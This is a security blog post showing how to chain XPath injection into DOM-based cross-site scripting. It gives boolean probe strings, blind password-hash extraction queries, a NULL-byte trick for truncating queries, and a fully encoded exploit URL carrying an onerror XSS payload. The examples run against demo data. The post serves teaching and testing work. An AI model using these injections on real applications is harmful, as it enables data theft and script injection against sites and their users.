Chaining XPath injections into DOM-based XSS

The way most web apps defend themselves against DOM-based Cross-Site Scripting is by validating input that later on is written into the DOM. Sometimes, web apps request data from APIs that is trusted because it didn't come from the user, so it isn't validated. This post will show a trick for tampering with data provided by APIs that didn't come from the user by using XPath injection. Since the data is not validated you can achieve DOM-based XSS.

This attack can be useful because implementations of XPath 1.0 have a very limited attack surface. Only with XPath 2.0 and XPath 3.1 more critical attacks become a possibility. Implementations of XPath 2.0 and 3.1 are not very popular so most web apps out there use version 1.0.

Since a lot of people don't know XPath very well, I'll provide the basics to demonstrate how XPath works in order to know how to exploit it.

The first step to scan a web app against XPath injections is by using boolean based conditions such as the followings:

/vulnerable_page?id=1' and '1'='1
/vulnerable_page?id=1' and '1'='0

/vulnerable_page?id=1" and "1"="1
/vulnerable_page?id=1' and "1"="0

/vulnerable_page?id=1 and 1=1
/vulnerable_page?id=1 and 1=0

As you can see, this is very similar to testing for SQL injection. In fact, just as SQL is a language for querying databases, XPath is a language for querying XML documents. Suppose the web app has the following XML document containing a list of different molecules:

...
       <molecule>
               <id>6</id>
               <name>Haloperidol</name>
               <filename>haloperidol.png</filename>
               <description>Antipsychotic with a lot of side-effects</description>
       </molecule>
       <molecule>
               <id>7</id>
               <name>Norepinephrine</name>
               <filename>norepinephrine.png</filename>
               <description>Catecholamine responsible for attention and stress</description>
       </molecule>
       <molecule>
               <id>8</id>
               <name>Oxcarbazepine</name>
               <filename>oxcarbazepine.png</filename>
               <description>Anticonvulsant and antiepileptic</description>
       </molecule>
...

The application has an API that receives the id GET parameter and uses it to craft an XPath query that fetches information from the XML document.

In this particular example, the API responds with a JSON object that contains all the information that will presented to the user (even though the API could respond in any kind of format such as pure XML).

There is a javascript code that parses the JSON object and then writes its content into the HTML code of the page:

If an XPath injection can be used to return a JSON object whose contents are defined by the attacker, then it would be possible to write any arbitrary value into the HTML code of the page, resulting in XSS.

The code in the API responsible for doing the XPath query looks like this:

data = xpath_processor.evaluate("//molecule[id/text()=" + id + "]")

This would result in the following XPath query:
//molecule[id/text()=6 and 1=1]

It says: return all <molecule> nodes that contain an <id> node whose text content is equal to 6

XPath injections

It is possible to use XPath injections to exfiltrate confidential information from the XML. Suppose the app uses an XML document to store user information:

<users>
       <user>
               <id>0</id>
               <username>root</username>
               <password>33ee7e1eb504b6619c1b445ca1442c21</password>
               <email>root@demo-lab.com</email>
       </user>
       <user>
               <id>1</id>
               <username>web-admin</username>
               <password>be3306f431dae5ebc93eebb291f4914a</password>
               <email>webadmin@demo-lab.com</email>
       </user>
</users>

Now imagine the following XPath expression (vulnerable to injection) used to return the email of a specific user:

data = xpath_processor.evaluate("//user[id/text()=" + id + "]/email")

Evaluated expression:
//user[id/text()=1]/email

This says: search all <user> nodes that have an <id> node whose text content is equal to 1 and return its <email> node.

An XPath injection can be used to exfiltrate information from the XML document by testing conditions that result in TRUE or FALSE responses:

//user[id/text()=1 and substring(//user[id/text()=0]/password,1,1)='1']/email
FALSE response

//user[id/text()=1 and substring(//user[id/text()=0]/password,1,1)='2']/email
FALSE response

//user[id/text()=1 and substring(//user[id/text()=0]/password,1,1)='3']/email
TRUE response

This says: return the <email> node of a <user> node that has an <id> equal to 1 if the first character of the <password> node inside the <user> node with id=0 is equal to '3'. Then you just iterate over all possible values and collect the TRUE and FALSE responses.

The blind problem

Usually XPath injections can only exfiltrate information one character at a time by testing boolean conditions because, if the XPath query is altered to return the <password> node instead of the <email> node it will result in invalid syntax due to the trailing text after the injection:

//user[id/text()=-1 or id/text()=0]/password]/email

The idea of using a single-line comment (just like -- or # in SQL) to ignore the trailing text might come to mind. The problem is that the XPath specification says that comments must start with (: and closed with :) . This means that if the comment is left unclosed, the expression results in an invalid syntax error.

After doing some simple fuzzing of Saxon (an XPath implementation developed by Saxonica) I found that it is possible to use a NULL byte to terminate the string and ignore everything after it. This trick makes it possible to return the content of any node instead of the originally intended node:

//user[id/text()=1 or id/text()=0]/password%00]/email

The trailing text doesn't cause an error anymore.

Escalate XPath injections into XSS

Okay, so remember the previous example of the XML document containing a list of different molecules? That XML document happens to be a catalog that is publicly available for anyone to access. So, in this case there's nothing confidential to exfiltrate.

In a case like this, chaining the XPath injection into a DOM-based XSS would be the way to go.

For your convenience, once again here are the screenshots of the API and the vulnerable page:

The code responsible for requesting the API and displaying its response:

The XPath query made by the API:
//molecule[id/text()=6 and 1=1]

It is possible to force XPath to return a string explicitly defined in the query itself:

//molecule[id/text()=1]/"hello"%00]

This query would force XPath to return the "hello" string instead of a node. However, such injection would yield a 500 INTERNAL SERVER ERROR response:

This is because the API is expecting XPath to return a set of XML nodes so that they can be formatted in JSON in order to yield a response. So the solution would be to return a string containing XML code with the values desired to be written into the page:

//molecule[id/text()=1]/'<whatever><id>51966</id><name>XSS payload</name><filename>lol.jpg</filename><description> <img src onerror=alert(/XSS/)> </description></whatever>'%00]

Remember to double URL-encode the / and & symbols and the NULL byte:

https://localhost/molecules/view/6]%252f%27%3Cwhatever%3E%3Cid%3E51966%3C%252fid%3E%3Cname%3EXSS%20payload%3C%252fname%3E%3Cfilename%3Elol.jpg%3C%252ffilename%3E%3Cdescription%3E%2526lt;img%20src%20onerror=alert(%252fXSS%252f)%2526gt;%3C%252fdescription%3E%3C%252fwhatever%3E%27%2500

And now you've escalated a useless XPath injection into a DOM-based XSS.

With the introduction of XPath 2.0 and XPath 3.1 it became possible to exfiltrate data from other XML documents instead of only the one being queried. It also became possible to exfiltrate data from any document type and not only XML. But sometimes none of these will do. The following URL links to a paper that describes more critical attacks that can be carried out to XPath versions 2.0 and 3.1 https://nzt-48.org/modern-xpath-exploitation

X: @ruben_v_pina
Mastodon/infosec.exchange: @ruben_v_pina
Linkedin: https://www.linkedin.com/in/ruben-v-pina/

Filed under: Hacking,Web Application Security,XSS - @ 2025-05-15 00:33

Tags: exploit, explotiation, hacker, hackers, hacking, injection, security, web app, web application, xml